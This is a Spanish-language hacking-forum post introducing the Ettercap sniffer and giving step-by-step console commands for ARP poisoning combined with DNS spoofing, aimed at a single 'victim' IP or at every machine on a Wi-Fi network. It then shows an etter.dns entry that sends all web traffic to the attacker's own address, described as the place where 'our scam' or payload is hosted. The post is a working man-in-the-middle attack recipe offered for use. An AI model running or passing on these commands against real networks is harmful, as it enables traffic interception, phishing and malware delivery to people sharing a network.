Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Ettercap

  • 0 Respuestas
  • 1434 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado airtom

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Mayo 24, 2018, 10:52:29 pm »
es un interceptor/sniffer/registrador para LANs con switch. Soporta direcciones activas y pasivas de varios protocolos (incluso aquellos cifrados, como SSH y HTTPS). También hace posible la inyección de datos en una conexión establecida y filtrado al vuelo aun manteniendo la conexión sincronizada gracias a su poder para establecer un Ataque Man-in-the-middle(Spoofing). Muchos modos de sniffing fueron implementados para darnos un conjunto de herramientas poderoso y completo de sniffing.


COMANDOS BASICOS DE ETERCAP POR CONSOLA

Abriendo un terminal y escribiendo las diferentes opciones de ettercap

nosotros usaremos por ejemplo unos de estes dos comandos para hacer el dnsspoof
🚫Este comando es para una ip específica si ya tenemos la ip de la víctima identificada

-ettercap -T -q -i wlan0 -P dns_spoof -M arp:remote /(ip victima)/ //

Este comando es para realizar el ataque en toda la red wifi tengan en cuenta que interfaz wifi tienen puede ser wlan0 wlan1.. otra por cable

-ettercap -T -q -P dns_spoof -M arp // // -i wlan0

Este segundo comandos hacen el dnsspoof sobre todas las maquinas de la red

Ademas de eso debemos modificar  modificar un archivo que se llama etter.dns, para localizar dicho archivo abrimos un terminal y escribimos locate etter.dns o vamos a  la ruta: usr/local/share/ettercap
ahí abrimos el archivo y lo modificamos con el comando nano etter.dns y lo podremos modificar en la consola

Ahora vamos hasta
para modificar las dns tenemos varias opciones pero yo me voy a centrar en las dos principales.

1. que todas las paginas web sean redirigidas a la que nosotros le mandemos, para eso tenemos que borrar todo lo que tenga la parte donde pone "microsoft sucks" y poner esto:

* A 192.168.1.120
Aquí ponemos a la ip nuestra en donde está corriendo nuestro scam o donde este alojado nuestro payload
Así cada vez que abra el navegador lo redirigira a donde queremos....

 

¿Te gustó el post? COMPARTILO!



MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit

Iniciado por BrowserNet

Respuestas: 8
Vistas: 7423
Último mensaje Abril 05, 2017, 01:37:02 am
por puntoCL
Tutorial Ettercap + etterfilter by k43l

Iniciado por k43l

Respuestas: 4
Vistas: 4081
Último mensaje Octubre 28, 2011, 02:31:40 pm
por Shama|TwoH
Tutorial Ettercap + etterfilter by k43l

Iniciado por Stiuvert

Respuestas: 0
Vistas: 2311
Último mensaje Marzo 30, 2012, 07:38:30 am
por Stiuvert
Captura de imagenes en una LAN con ettercap y Drifnet

Iniciado por k43l

Respuestas: 3
Vistas: 5237
Último mensaje Noviembre 18, 2012, 02:00:42 pm
por ssw_1
Hacking con Ettercap y SSLstrip

Iniciado por k43l

Respuestas: 11
Vistas: 8846
Último mensaje Junio 10, 2013, 05:01:31 pm
por mfuck